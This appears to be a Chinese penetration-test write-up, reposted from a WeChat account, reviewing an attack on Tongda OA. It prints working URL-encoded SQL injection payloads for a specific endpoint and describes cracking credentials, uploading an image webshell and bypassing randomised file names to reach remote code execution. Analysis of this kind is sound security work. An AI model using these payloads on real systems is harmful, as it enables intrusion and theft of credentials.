一波三折的通达OA—复盘

admin
admin
admin
102205
文章
87
评论
2021年4月25日08:01:34评论143 views字数 1459阅读4分51秒阅读模式
一波三折的通达OA—复盘

攻击路径:

  1. wooyun上的历史漏洞

  2. 通过一枚sql注入获取到账号密码

  3. 登录,文件上传(需要登录),图片马

  4. 文件包含 —> RCE


漏洞触发点:

wooyun-2015-0116359(前台sql注入)

/general/score/flow/scoredate/result.php?FLOW_ID=

获取数据库版本

mysql

  • select version()

  • select @@version

/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20verion()),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20@@version),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23

获取当前用户

  • select user()

  • select system_user()

/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20user()),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from(select%20count(*),concat(floor(rand(0)*2),(substring((select%20system_user()),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23


最后直接上sqlmap跑,并成功获取到账号密码。但是由于没法直接解密,这里采用的是构造字典然后爆破姿势成功获取到账号。


文件上传(需要登录)

前期准备:

  • 图片马

tongda.jpg一波三折的通达OA—复盘


  • 构造上传表单一波三折的通达OA—复盘一波三折的通达OA—复盘

一波三折的通达OA—复盘

到这里,图片马的上传算是成功完成了。


文件包含

上传的图片马将会被重命名且没有回显。经过本地搭建环境测试发现其重命名规则为:

tongda.jpg —> 10位随机数.tongda.jpg

例如:

1020634445.tongda.jpg

所以此时便有了有两条思路

  • 10^10次尝试 :爆破文件名前置的10位随机数

  • <<<<<<<<<<.tongda.jpg

  • >>>>>>>>>>.tongda.jpg一波三折的通达OA—复盘


最后成功通过'<'构造了马的包含姿势。一波三折的通达OA—复盘




本文始发于微信公众号(don9sec):一波三折的通达OA—复盘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月25日08:01:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一波三折的通达OA—复盘http://cn-sec.com/archives/214825.html

发表评论

匿名网友 填写信息